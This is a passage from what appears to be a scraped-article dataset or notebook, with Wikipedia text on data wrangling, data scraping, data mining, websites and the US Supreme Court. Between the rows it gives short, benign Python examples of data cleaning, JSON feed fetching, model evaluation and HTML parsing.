to read. All names are now formatted the same way (first name, last name), phone numbers are also formatted the same way (area code-XXX-XXXX), dates are formatted numerically (YYYY-mm-dd), and states are no longer abbreviated. The entry for Jacob Alan did not have fully formed data (the area code on the phone number is missing and the birth date had no year), so it was discarded from the data set. Now that the resulting data set is cleaned and readable, it is ready to be either deployed or evaluated. The data transformations are typically applied to distinct entities (e.g. fields, rows, columns, data values, etc.) within a data set, and could include such actions as extractions, parsing, joining, standardizing, augmenting, cleansing, consolidating, and filtering to create desired wrangling outputs that can be leveraged downstream. The recipients could be individuals, such as data architects or data scientists who will investigate the data further, business users who will consume the data directly in reports, or systems that will further process the data and write it into targets such as data warehouses, data lakes, or downstream applications. Depending on the amount and format of the incoming data, data wrangling has traditionally been performed manually (e.g. via spreadsheets such as Excel), with tools like KNIME, or via scripts in languages such as Python or SQL. R, a language often used in data mining and statistical data analysis, is now also sometimes used for data wrangling. 6 Data wranglers typically have skill sets in R or Python, SQL, PHP, Scala, and other languages typically used for analyzing data. Visual data wrangling systems were developed to make data wrangling accessible for non-programmers, and simpler for programmers. 
Some of these also include embedded AI recommenders and programming-by-example facilities to provide user assistance, and program synthesis techniques to autogenerate scalable dataflow code. Early prototypes of visual data wrangling tools include OpenRefine and the Stanford/Berkeley Wrangler research system; 7 the latter evolved into Trifacta. Other terms for these processes have included data franchising, 8 data preparation, and data munging. Given a set of data that contains information on medical patients, your goal is to find correlations for a disease. Before you can start iterating through the data, ensure that you have an understanding of the desired result: are you looking for patients who have the disease? Are there other diseases that could be the cause? Once an understanding of the outcome is achieved, the data wrangling process can begin. Start by determining the structure of the outcome and what is important for understanding the disease diagnosis. Once a final structure is determined, clean the data by removing any data points that are not helpful or are malformed; this could include patients who have not been diagnosed with any disease. After cleaning, look at the data again: is there anything already known that could be added to the data set that would benefit it? An example could be the most common diseases in the area; America and India are very different when it comes to the most common diseases. Now comes the validation step: determine validation rules specifying which data points need to be checked for validity; this could include date of birth or checking for specific diseases. After the validation step, the data should be organized and prepared for either deployment or evaluation. This process can be beneficial for determining correlations for disease diagnosis, as it will reduce the vast amount of data into something that can be easily analyzed for an accurate result. |
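The wrangling walkthrough above (standardizing names, phone numbers, and dates, then discarding malformed rows) maps naturally onto pandas, which this notebook already imports. The sketch below is illustrative only: the column names, raw values, and state lookup table are hypothetical stand-ins for the article's small example set, not data produced by this project.
import re
import pandas as pd
# Hypothetical raw records standing in for the article's small example set
raw = pd.DataFrame({
    "name":  ["SMITH, jane", "Jacob Alan", "doe, JOHN"],
    "phone": ["(404) 5550147", "555-0199", "7705550162"],
    "dob":   ["1990/03/14", "July 4", "1985-12-01"],
    "state": ["GA", "tx", "GA"],
})
STATE_NAMES = {"GA": "Georgia", "TX": "Texas"}  # assumed lookup table
def clean_name(value):
    # Normalize "LAST, first" or mixed case into "First Last"
    parts = [p.strip() for p in value.split(",")]
    if len(parts) == 2:
        value = f"{parts[1]} {parts[0]}"
    return value.title()
def clean_phone(value):
    # Keep only digits; require area code + 7 digits, otherwise mark as malformed
    digits = re.sub(r"\D", "", value)
    if len(digits) != 10:
        return None
    return f"{digits[:3]}-{digits[3:6]}-{digits[6:]}"
def clean_dob(value):
    # Accept only dates that include a year; anything else is malformed
    for fmt in ("%Y-%m-%d", "%Y/%m/%d"):
        try:
            return pd.to_datetime(value, format=fmt).strftime("%Y-%m-%d")
        except (ValueError, TypeError):
            continue
    return None
df = raw.copy()
df["name"] = df["name"].map(clean_name)
df["phone"] = df["phone"].map(clean_phone)
df["dob"] = df["dob"].map(clean_dob)
df["state"] = df["state"].str.upper().map(STATE_NAMES)
# Discard rows with malformed entries, as the article does for the incomplete record
df = df.dropna().reset_index(drop=True)
print(df)
Running this drops the incomplete "Jacob Alan"-style row (missing area code, birth date without a year) and leaves consistently formatted names, phone numbers, dates, and full state names, mirroring the cleaned table the entry describes.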
211 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-4 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
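As a small companion to the screen-scraping and report-mining discussion above, the sketch below shows the "listening to data feeds" approach the entry mentions: instead of parsing rendered HTML, a scraper requests the JSON endpoint a page loads its data from. The URL and field names here are placeholders, not a real API, so treat this as a pattern rather than a working target.
import requests
# Placeholder endpoint: many dynamic pages fetch their content from a JSON feed
# in the background; requesting that feed directly is often simpler and more
# robust than scraping the rendered page.
FEED_URL = "https://example.com/api/products"  # hypothetical, not a real API
def fetch_feed(url, timeout=10):
    response = requests.get(url, headers={"Accept": "application/json"}, timeout=timeout)
    response.raise_for_status()   # fail loudly on HTTP errors
    return response.json()        # parse the JSON body into Python objects
try:
    items = fetch_feed(FEED_URL)
    for item in items[:5]:
        # Field names are assumptions; adjust them to whatever the feed returns
        print(item.get("name"), item.get("price"))
except requests.RequestException as exc:
    print(f"Feed request failed: {exc}")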
212 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_mining | Data mining is the process of extracting and discovering patterns in large data sets involving methods at the intersection of machine learning, statistics, and database systems. 1 Data mining is an interdisciplinary subfield of computer science and statistics with an overall goal of extracting information (with intelligent methods) from a data set and transforming the information into a comprehensible structure for further use. 1 2 3 4 Data mining is the analysis step of the "knowledge discovery in databases" process, or KDD. 5 Aside from the raw analysis step, it also involves database and data management aspects, data pre-processing, model and inference considerations, interestingness metrics, complexity considerations, post-processing of discovered structures, visualization, and online updating. 1 The term "data mining" is a misnomer because the goal is the extraction of patterns and knowledge from large amounts of data, not the extraction (mining) of data itself. 6 It also is a buzzword 7 and is frequently applied to any form of large-scale data or information processing (collection, extraction, warehousing, analysis, and statistics) as well as any application of computer decision support system, including artificial intelligence (e.g., machine learning) and business intelligence. Often the more general terms (large scale) data analysis and analytics—or, when referring to actual methods, artificial intelligence and machine learning—are more appropriate. The actual data mining task is the semi-automatic or automatic analysis of large quantities of data to extract previously unknown, interesting patterns such as groups of data records (cluster analysis), unusual records (anomaly detection), and dependencies (association rule mining, sequential pattern mining). This usually involves using database techniques such as spatial indices. These patterns can then be seen as a kind of summary of the input data, and may be used in further analysis or, for example, in machine learning and predictive analytics. For example, the data mining step might identify multiple groups in the data, which can then be used to obtain more accurate prediction results by a decision support system. Neither the data collection, data preparation, nor result interpretation and reporting is part of the data mining step, although they do belong to the overall KDD process as additional steps. The difference between data analysis and data mining is that data analysis is used to test models and hypotheses on the dataset, e.g., analyzing the effectiveness of a marketing campaign, regardless of the amount of data. In contrast, data mining uses machine learning and statistical models to uncover clandestine or hidden patterns in a large volume of data. 8 The related terms data dredging, data fishing, and data snooping refer to the use of data mining methods to sample parts of a larger population data set that are (or may be) too small for reliable statistical inferences to be made about the validity of any patterns discovered. These methods can, however, be used in creating new hypotheses to test against the larger data populations. In the 1960s, statisticians and economists used terms like data fishing or data dredging to refer to what they considered the bad practice of analyzing data without an a-priori hypothesis. 
The term "data mining" was used in a similarly critical way by economist Michael Lovell in an article published in the Review of Economic Studies in 1983. 9 10 Lovell indicates that the practice "masquerades under a variety of aliases, ranging from "experimentation" (positive) to "fishing" or "snooping" (negative). The term data mining appeared around 1990 in the database community, with generally positive connotations. For a short time in 1980s, the phrase "database mining" , was used, but since it was trademarked by HNC, a San Diego-based company, to pitch their Database Mining Workstation; 11 researchers consequently turned to data mining. Other terms used include data archaeology, information harvesting, information discovery, knowledge extraction, etc. Gregory Piatetsky-Shapiro coined the term "knowledge discovery in databases" for the first workshop on the same topic (KDD 1989) and this term became more popular in the AI and machine learning communities. However, the term data mining became more popular in the business and press communities. 12 Currently, the terms data mining and knowledge discovery are used interchangeably. The manual extraction of patterns from data has occurred for centuries. Early methods of identifying patterns in data include Bayes' theorem (1700s) and regression analysis (1800s). 13 The proliferation, ubiquity and increasing power of computer technology have dramatically increased data collection, storage, and manipulation ability. As data sets have grown in size and complexity, direct "hands-on" data analysis has increasingly been augmented with indirect, automated data processing, aided by other discoveries in computer science, specially in the field of machine learning, such as neural networks, cluster analysis, genetic algorithms (1950s), decision trees and decision rules (1960s), and support vector machines (1990s). Data mining is the process of applying these methods with the intention of uncovering hidden patterns. 14 in large data sets. It bridges the gap from applied statistics and artificial intelligence (which usually provide the mathematical background) to database management by exploiting the way data is stored and indexed in databases to execute the actual learning and discovery algorithms more efficiently, allowing such methods to be applied to ever-larger data sets. The knowledge discovery in databases (KDD) process is commonly defined with the stages: It exists, however, in many variations on this theme, such as the Cross-industry standard process for data mining (CRISP-DM) which defines six phases: or a simplified process such as (1) Pre-processing, (2) Data Mining, and (3) Results Validation. Polls conducted in 2002, 2004, 2007 and 2014 show that the CRISP-DM methodology is the leading methodology used by data miners. 15 16 17 18 The only other data mining standard named in these polls was SEMMA. However, 3 4 times as many people reported using CRISP-DM. Several teams of researchers have published reviews of data mining process models, 19 and Azevedo and Santos conducted a comparison of CRISP-DM and SEMMA in 2008. 20 Before data mining algorithms can be used, a target data set must be assembled. As data mining can only uncover patterns actually present in the data, the target data set must be large enough to contain these patterns while remaining concise enough to be mined within an acceptable time limit. A common source for data is a data mart or data warehouse. 
Pre-processing is essential to analyze the multivariate data sets before data mining. The target set is then cleaned. Data cleaning removes the observations containing noise and those with missing data. Data mining involves six common classes of tasks: anomaly detection, association rule learning, clustering, classification, regression, and summarization. 5 Data mining can unintentionally be misused, producing results that appear to be significant but which do not actually predict future behavior and cannot be reproduced on a new sample of data, therefore being of little use. This is sometimes caused by investigating too many hypotheses and not performing proper statistical hypothesis testing. A simple version of this problem in machine learning is known as overfitting, but the same problem can arise at different phases of the process and thus a train/test split—when applicable at all—may not be sufficient to prevent this from happening. 21 The final step of knowledge discovery from data is to verify that the patterns produced by the data mining algorithms occur in the wider data set. Not all patterns found by the algorithms are necessarily valid. It is common for data mining algorithms to find patterns in the training set which are not present in the general data set. This is called overfitting. To overcome this, the evaluation uses a test set of data on which the data mining algorithm was not trained. The learned patterns are applied to this test set, and the resulting output is compared to the desired output. For example, a data mining algorithm trying to distinguish "spam" from "legitimate" e-mails would be trained on a training set of sample e-mails. Once trained, the learned patterns would be applied to the test set of e-mails on which it had not been trained. The accuracy of the patterns can then be measured from how many e-mails they correctly classify. Several statistical methods may be used to evaluate the algorithm, such as ROC curves. If the learned patterns do not meet the desired standards, it is necessary to re-evaluate and change the pre-processing and data mining steps. If the learned patterns do meet the desired standards, then the final step is to interpret the learned patterns and turn them into knowledge. The premier professional body in the field is the Association for Computing Machinery's (ACM) Special Interest Group (SIG) on Knowledge Discovery and Data Mining (SIGKDD). 22 23 Since 1989, this ACM SIG has hosted an annual international conference and published its proceedings, 24 and since 1999 it has published a biannual academic journal titled "SIGKDD Explorations". 25 There are a number of computer science conferences on data mining, and data mining topics are also present in many data management/database conferences such as the ICDE Conference, SIGMOD Conference and International Conference on Very Large Data Bases. There have been some efforts to define standards for the data mining process, for example, the 1999 European Cross Industry Standard Process for Data Mining (CRISP-DM 1.0) and the 2004 Java Data Mining standard (JDM 1.0). Development on successors to these processes (CRISP-DM 2.0 and JDM 2.0) was active in 2006 but has stalled since. JDM 2.0 was withdrawn without reaching a final draft. For exchanging the extracted models—in particular for use in predictive analytics—the key standard is the Predictive Model Markup Language (PMML), which is an XML-based language developed by the Data Mining Group (DMG) and supported as exchange format by many data mining applications. 
As the name suggests, it only covers prediction models, a particular data mining task of high importance to business applications. However, extensions to cover (for example) subspace clustering have been proposed independently of the DMG. 26 Data mining is used wherever there is digital data available. Notable examples of data mining can be found throughout business, medicine, science, finance, construction, and surveillance. While the term "data mining" itself may have no ethical implications, it is often associated with the mining of information in relation to user behavior (ethical and otherwise). 27 The ways in which data mining can be used can in some cases and contexts raise questions regarding privacy, legality, and ethics. 28 In particular, data mining government or commercial data sets for national security or law enforcement purposes, such as in the Total Information Awareness Program or in ADVISE, has raised privacy concerns. 29 30 Data mining requires data preparation, which can uncover information or patterns that compromise confidentiality and privacy obligations. A common way for this to occur is through data aggregation. Data aggregation involves combining data (possibly from various sources) in a way that facilitates analysis (but that also might make identification of private, individual-level data deducible or otherwise apparent). 31 This is not data mining per se, but a result of the preparation of data before—and for the purposes of—the analysis. The threat to an individual's privacy comes into play when the data, once compiled, cause the data miner, or anyone who has access to the newly compiled data set, to be able to identify specific individuals, especially when the data were originally anonymous. 32 It is recommended to be aware of the following before data are collected: 31 Data may also be modified so as to become anonymous, so that individuals may not readily be identified. 31 However, even "anonymized" data sets can potentially contain enough information to allow identification of individuals, as occurred when journalists were able to find several individuals based on a set of search histories that were inadvertently released by AOL. 33 The inadvertent revelation of personally identifiable information leading to the provider violates Fair Information Practices. This indiscretion can cause financial, emotional, or bodily harm to the indicated individual. In one instance of privacy violation, the patrons of Walgreens filed a lawsuit against the company in 2011 for selling prescription information to data mining companies who in turn provided the data to pharmaceutical companies. 34 Europe has rather strong privacy laws, and efforts are underway to further strengthen the rights of the consumers. However, the U.S.–E.U. Safe Harbor Principles, developed between 1998 and 2000, currently effectively expose European users to privacy exploitation by U.S. companies. As a consequence of Edward Snowden's global surveillance disclosure, there has been increased discussion to revoke this agreement, as in particular the data will be fully exposed to the National Security Agency, and attempts to reach an agreement with the United States have failed. 35 In the United Kingdom in particular there have been cases of corporations using data mining as a way to target certain groups of customers, forcing them to pay unfairly high prices. 
These groups tend to be people of lower socio-economic status who are not savvy to the ways they can be exploited in digital market places. 36 In the United States, privacy concerns have been addressed by the US Congress via the passage of regulatory controls such as the Health Insurance Portability and Accountability Act (HIPAA). The HIPAA requires individuals to give their "informed consent" regarding information they provide and its intended present and future uses. According to an article in Biotech Business Week, "[i]n practice, HIPAA may not offer any greater protection than the longstanding regulations in the research arena", says the AAHC. More importantly, the rule's goal of protection through informed consent is approaching a level of incomprehensibility to average individuals. 37 This underscores the necessity for data anonymity in data aggregation and mining practices. U.S. information privacy legislation such as HIPAA and the Family Educational Rights and Privacy Act (FERPA) applies only to the specific areas that each such law addresses. The use of data mining by the majority of businesses in the U.S. is not controlled by any legislation. Under European copyright and database laws, the mining of in-copyright works (such as by web mining) without the permission of the copyright owner is not legal. Where a database is pure data in Europe, it may be that there is no copyright—but database rights may exist, so data mining becomes subject to intellectual property owners' rights that are protected by the Database Directive. On the recommendation of the Hargreaves review, the UK government amended its copyright law in 2014 to allow content mining as a limitation and exception. 38 The UK was the second country in the world to do so after Japan, which introduced an exception in 2009 for data mining. However, due to the restriction of the Information Society Directive (2001), the UK exception only allows content mining for non-commercial purposes. UK copyright law also does not allow this provision to be overridden by contractual terms and conditions. Since 2020, Switzerland has also been regulating data mining by allowing it in the research field under certain conditions laid down by art. 24d of the Swiss Copyright Act. This new article entered into force on 1 April 2020. 39 The European Commission facilitated stakeholder discussion on text and data mining in 2013, under the title of Licences for Europe. 40 The focus on licensing, rather than limitations and exceptions, as the solution to this legal issue led representatives of universities, researchers, libraries, civil society groups and open access publishers to leave the stakeholder dialogue in May 2013. 41 US copyright law, and in particular its provision for fair use, upholds the legality of content mining in America, as do the laws of other fair use countries such as Israel, Taiwan and South Korea. As content mining is transformative, that is, it does not supplant the original work, it is viewed as being lawful under fair use. For example, as part of the Google Book settlement the presiding judge on the case ruled that Google's digitization project of in-copyright books was lawful, in part because of the transformative uses that the digitization project displayed—one being text and data mining. 42 The following applications are available under free open-source licenses. Public access to application source code is also available. The following applications are available under proprietary licenses. 
For more information about extracting information out of data (as opposed to analyzing data), see: |
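The data mining entry above repeatedly stresses holding out a test set so that patterns found during training are verified before being treated as knowledge (the overfitting problem). Below is a minimal sketch of that evaluation loop using scikit-learn, which is an assumption on my part since it is not used elsewhere in this notebook; the synthetic data stands in for a labeled corpus such as the spam/legitimate e-mail example.
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score, roc_auc_score
from sklearn.model_selection import train_test_split
# Synthetic stand-in for a labeled data set (features plus a binary label)
X, y = make_classification(n_samples=1000, n_features=20, random_state=0)
# Hold out a test set the model never sees during training
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
model = LogisticRegression(max_iter=1000).fit(X_train, y_train)
# Evaluate only on the held-out data; training-set scores would look optimistic
pred = model.predict(X_test)
scores = model.predict_proba(X_test)[:, 1]
print("Test accuracy:", accuracy_score(y_test, pred))
print("Test ROC AUC:", roc_auc_score(y_test, scores))
If the held-out scores fall short of the desired standard, the entry's advice applies: revisit pre-processing and the mining step rather than trusting patterns that only appear in the training set.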
213 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Website | A website (also written as a web site) is a collection of web pages and related content that is identified by a common domain name and published on at least one web server. Websites are typically dedicated to a particular topic or purpose, such as news, education, commerce, entertainment, or social media. Hyperlinking between web pages guides the navigation of the site, which often starts with a home page. The most-visited sites are Google, YouTube, and Facebook. All publicly accessible websites collectively constitute the World Wide Web. There are also private websites that can only be accessed on a private network, such as a company's internal website for its employees. Users can access websites on a range of devices, including desktops, laptops, tablets, and smartphones. The app used on these devices is called a web browser. The World Wide Web (WWW) was created in 1989 by the British CERN computer scientist Tim Berners-Lee. 1 2 On 30 April 1993, CERN announced that the World Wide Web would be free to use for anyone, contributing to the immense growth of the Web. 3 Before the introduction of the Hypertext Transfer Protocol (HTTP), other protocols such as File Transfer Protocol and the gopher protocol were used to retrieve individual files from a server. These protocols offer a simple directory structure in which the user navigates and where they choose files to download. Documents were most often presented as plain text files without formatting or were encoded in word processor formats. While "web site" was the original spelling (sometimes capitalized "Web site", since "Web" is a proper noun when referring to the World Wide Web), this variant has become rarely used, and "website" has become the standard spelling. All major style guides, such as The Chicago Manual of Style 4 and the AP Stylebook, 5 have reflected this change. In February 2009, Netcraft, an Internet monitoring company that has tracked Web growth since 1995, reported that there were 215,675,903 websites with domain names and content on them in 2009, compared to just 19,732 websites in August 1995. 6 After reaching 1 billion websites in September 2014, a milestone confirmed by Netcraft in its October 2014 Web Server Survey and that Internet Live Stats was the first to announce—as attested by this tweet from the inventor of the World Wide Web himself, Tim Berners-Lee—the number of websites in the world has subsequently declined, reverting to a level below 1 billion. This is due to the monthly fluctuations in the count of inactive websites. The number of websites continued growing to over 1 billion by March 2016 and has continued growing since. 7 The Netcraft Web Server Survey in January 2020 reported that there are 1,295,973,827 websites and in April 2021 reported that there are 1,212,139,815 sites across 10,939,637 web-facing computers, and 264,469,666 unique domains. 8 An estimated 85 percent of all websites are inactive. 9 A static website is one that has Web pages stored on the server in the format that is sent to a client Web browser. It is primarily coded in Hypertext Markup Language (HTML); Cascading Style Sheets (CSS) are used to control appearance beyond basic HTML. Images are commonly used to create the desired appearance and as part of the main content. Audio or video might also be considered "static" content if it plays automatically or is generally non-interactive. 
This type of website usually displays the same information to all visitors. Similar to handing out a printed brochure to customers or clients, a static website will generally provide consistent, standard information for an extended period of time. Although the website owner may make updates periodically, it is a manual process to edit the text, photos, and other content and may require basic website design skills and software. Simple forms or marketing examples of websites, such as a classic website, a five-page website or a brochure website are often static websites, because they present pre-defined, static information to the user. This may include information about a company and its products and services through text, photos, animations, audio video, and navigation menus. Static websites may still use server side includes (SSI) as an editing convenience, such as sharing a common menu bar across many pages. As the site's behavior to the reader is still static, this is not considered a dynamic site. A dynamic website is one that changes or customizes itself frequently and automatically. Server-side dynamic pages are generated "on the fly" by computer code that produces the HTML (CSS files are responsible for appearance and thus are static files). There is a wide range of software systems, such as CGI, Java Servlets and Java Server Pages (JSP), Active Server Pages and ColdFusion (CFML), that are available to generate dynamic Web systems and dynamic sites. Various Web application frameworks and Web template systems are available for general-use programming languages like Perl, PHP, Python and Ruby to make it faster and easier to create complex dynamic websites. A site can display the current state of a dialogue between users, monitor a changing situation, or provide information in some way personalized to the requirements of the individual user. For example, when the front page of a news site is requested, the code running on the webserver might combine stored HTML fragments with news stories retrieved from a database or another website via RSS to produce a page that includes the latest information. Dynamic sites can be interactive by using HTML forms, storing and reading back browser cookies, or by creating a series of pages that reflect the previous history of clicks. Another example of dynamic content is when a retail website with a database of media products allows a user to input a search request, e.g. for the keyword Beatles. In response, the content of the Web page will change from the way it looked before, and will then display a list of Beatles products like CDs, DVDs, and books. Dynamic HTML uses JavaScript code to instruct the Web browser how to interactively modify the page contents. One way to simulate a certain type of dynamic website while avoiding the performance loss of initiating the dynamic engine on a per-user or per-connection basis is to periodically automatically regenerate a large series of static pages. Early websites had only text, and soon after, images. Web browser plug-ins were then used to add audio, video, and interactivity (such as for a rich Web application that mirrors the complexity of a desktop application like a word processor). Examples of such plug-ins are Microsoft Silverlight, Adobe Flash Player, Adobe Shockwave Player, and Java SE. HTML 5 includes provisions for audio and video without plugins. 
JavaScript is also built into most modern web browsers, and allows website creators to send code to the web browser that instructs it how to interactively modify page content and communicate with the web server if needed. The browser's internal representation of the content is known as the Document Object Model (DOM). WebGL (Web Graphics Library) is a modern JavaScript API for rendering interactive 3D graphics without the use of plug-ins. It allows interactive content such as 3D animations, visualizations and video explainers to be presented to users in the most intuitive way. 10 A 2010s-era trend in websites called "responsive design" has given the best viewing experience, as it provides a device-based layout for users. These websites change their layout according to the device or mobile platform, thus giving a rich user experience. 11 Websites can be divided into two broad categories—static and interactive. Interactive sites are part of the Web 2.0 community of sites and allow for interactivity between the site owner and site visitors or users. Static sites serve or capture information but do not allow engagement with the audience or users directly. Some websites are informational or produced by enthusiasts or for personal use or entertainment. Many websites do aim to make money using one or more business models, including: |
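Since this notebook scrapes pages with requests and BeautifulSoup, the static-versus-dynamic distinction above matters in practice: a static or server-rendered page ships its content in the HTML response, while a dynamic page may only build that content in the browser with JavaScript. The sketch below is one way to check which case you are in; the URL and CSS selector are hypothetical placeholders, not targets used elsewhere in this project.
import requests
from bs4 import BeautifulSoup
URL = "https://example.com/catalog"   # placeholder page
SELECTOR = "div.product"              # hypothetical element you expect to scrape
def appears_in_raw_html(url, selector, timeout=10):
    # Fetch the HTML exactly as the server sends it, with no JavaScript executed
    html = requests.get(url, timeout=timeout).text
    soup = BeautifulSoup(html, "html5lib")
    # If the element is present here, plain requests + BeautifulSoup is enough;
    # if not, the page likely builds it client-side, so look for its JSON feed
    # or use a browser-automation tool instead.
    return soup.select_one(selector) is not None
print("Content present in raw HTML:", appears_in_raw_html(URL, SELECTOR))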
214 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/United_States_Supreme_Court | The Supreme Court of the United States (SCOTUS) is the highest court in the federal judiciary of the United States. It has ultimate appellate jurisdiction over all U.S. federal court cases, and over state court cases that turn on questions of U.S. constitutional or federal law. It also has original jurisdiction over a narrow range of cases, specifically "all Cases affecting Ambassadors, other public Ministers and Consuls, and those in which a State shall be Party". 2 The court holds the power of judicial review: the ability to invalidate a statute for violating a provision of the Constitution. It is also able to strike down presidential directives for violating either the Constitution or statutory law. 3 Established by Article Three of the United States Constitution, the composition and procedures of the Supreme Court were originally established by the 1st Congress through the Judiciary Act of 1789. The court consists of nine justices: the chief justice of the United States and eight associate justices, and the justices meet at the Supreme Court Building in Washington, D.C. Justices have lifetime tenure, meaning they remain on the court until they die, retire, resign, or are impeached and removed from office. 3 When a vacancy occurs, the president, with the advice and consent of the Senate, appoints a new justice. Each justice has a single vote in deciding the cases argued before the court. When in the majority, the chief justice decides who writes the opinion of the court; otherwise, the most senior justice in the majority assigns the task of writing the opinion. The Supreme Court receives on average about 7,000 petitions for writs of certiorari each year, but grants only about 80. 4 It was while debating the separation of powers between the legislative and executive departments that delegates to the 1787 Constitutional Convention established the parameters for the national judiciary. Creating a "third branch" of government was a novel idea; in the English tradition, judicial matters had been treated as an aspect of royal (executive) authority. Early on, the delegates who were opposed to having a strong central government argued that national laws could be enforced by state courts, while others, including James Madison, advocated for a national judicial authority consisting of tribunals chosen by the national legislature. It was proposed that the judiciary should have a role in checking the executive's power to veto or revise laws. Eventually, the framers compromised by sketching only a general outline of the judiciary in Article Three of the United States Constitution, vesting federal judicial power in "one supreme Court, and in such inferior Courts as the Congress may from time to time ordain and establish". 5 6 They delineated neither the exact powers and prerogatives of the Supreme Court nor the organization of the judicial branch as a whole. The 1st United States Congress provided the detailed organization of a federal judiciary through the Judiciary Act of 1789. The Supreme Court, the country's highest judicial tribunal, was to sit in the nation's capital and would initially be composed of a chief justice and five associate justices. The act also divided the country into judicial districts, which were in turn organized into circuits. 
